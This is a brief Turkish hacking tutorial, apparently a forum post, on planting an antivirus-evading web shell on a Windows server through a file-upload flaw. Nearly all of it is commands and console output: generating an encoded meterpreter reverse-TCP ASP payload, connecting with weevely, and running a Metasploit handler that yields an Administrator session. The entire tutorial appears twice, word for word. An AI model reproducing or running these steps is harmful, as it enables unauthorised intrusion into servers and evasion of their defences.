Upload açığı bulduğunuz windows servera antivirüs programlarına yakalanmayan shell atmanız gerekmekte (çoğuna) yoksa shell otomatik olarak silinir
metasploiti açtıktan sonra
msfpayload windows/meterpreter/reverse_tcp LHOST=localipniz LPORT=443 R | msfencode -t raw -e x86/shikata_ga_nai -c3 | msfencode -t asp -o sh.asp
dosyamızı oluşturduk oluşturduğumuz dosyayı sunucuya yükleyip terminal ile sunucuya bağlanalım
weevely http://localip/sh.php sifreniz
weevely ile shelle baglantı kurduk
root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST localip
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit
meterpreter > getuid
Server username: server\Administrator
meterpreter > sysinfo
Computer : SERVER
OS :Microsoft Windows NT 6.1.7601 Service Pack 1
Architecture : x64
Meterpreter : x86/win32
meterpreter >
artık shell hazır tarayıcınız üzerinden açabilirsiniz
metasploiti açtıktan sonra
msfpayload windows/meterpreter/reverse_tcp LHOST=localipniz LPORT=443 R | msfencode -t raw -e x86/shikata_ga_nai -c3 | msfencode -t asp -o sh.asp
dosyamızı oluşturduk oluşturduğumuz dosyayı sunucuya yükleyip terminal ile sunucuya bağlanalım
weevely http://localip/sh.php sifreniz
weevely ile shelle baglantı kurduk
root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST localip
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit
meterpreter > getuid
Server username: server\Administrator
meterpreter > sysinfo
Computer : SERVER
OS :Microsoft Windows NT 6.1.7601 Service Pack 1
Architecture : x64
Meterpreter : x86/win32
meterpreter >
artık shell hazır tarayıcınız üzerinden açabilirsiniz